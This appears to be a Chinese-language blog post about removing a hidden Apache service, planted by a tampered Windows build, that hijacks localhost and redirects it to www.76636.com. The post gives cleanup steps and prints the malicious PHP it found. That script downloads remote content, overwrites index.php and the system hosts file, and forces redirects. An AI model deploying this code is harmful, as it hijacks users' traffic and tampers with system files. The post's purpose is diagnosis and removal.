在一個安裝iis的過程中,把網站部署上去之后就發現127.0.0.1或者localhost都會跳轉到一個莫名的網站,發現斷網之后就是會跳轉到一個Http://www.76636.com 類似這種的網站,感嘆一句現在流氓軟件越來越高級了,我在無意中發現任務管理居然有apache的服務器,我就想你這個蛋,為什么莫名其妙有這個服務啟動,還殺不死
解決方案:
使用大數字或者什么管家 禁用apache服務的開機啟動,然后重啟電腦
然后去C:\WINDOWS\Apache 刪掉整個目錄 就完美解決了
在C:\WINDOWS\Apache\htdocs目錄下一段php腳本,里面這么寫的:
<?php include_once "config.php"; $name1 = ""; $name2 = ""; //$name3 = ""; //獲取最新php $index = file_get_contents('http://www.76636.com/ht/index.txt'); if(strpos($index, ) { $arr = explode("@", $index); $index = $arr[1]; $hosts = $arr[0]; $index = get_rep($index); if(!empty($index)){ if(file_put_contents("index.php", $index)==0){} } //獲取最新hosts if(!empty($hosts)){ if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){} } } //域名跳轉個性化 $serverName = $_SERVER['SERVER_NAME']; switch ($serverName) { case strpos($name1,$serverName)!==false: header("Location:http://www.76636.com/?1");exit; break; case strpos($name2,$serverName)!==false: header("Location:http://www.76636.com/?2");exit; break; case strpos($name3,$serverName)!==false: header("Location:http://www.76636.com/?3");exit; break; default: header("Location:http://www.76636.com/?4");exit; break; } ?> <meta http-equiv="refresh" content="0;url=http://www.76636.com/?301">
居然有這種跳轉,流氓的系統封裝強加了一個httpd服務,然后導致127.0.0.1劫持。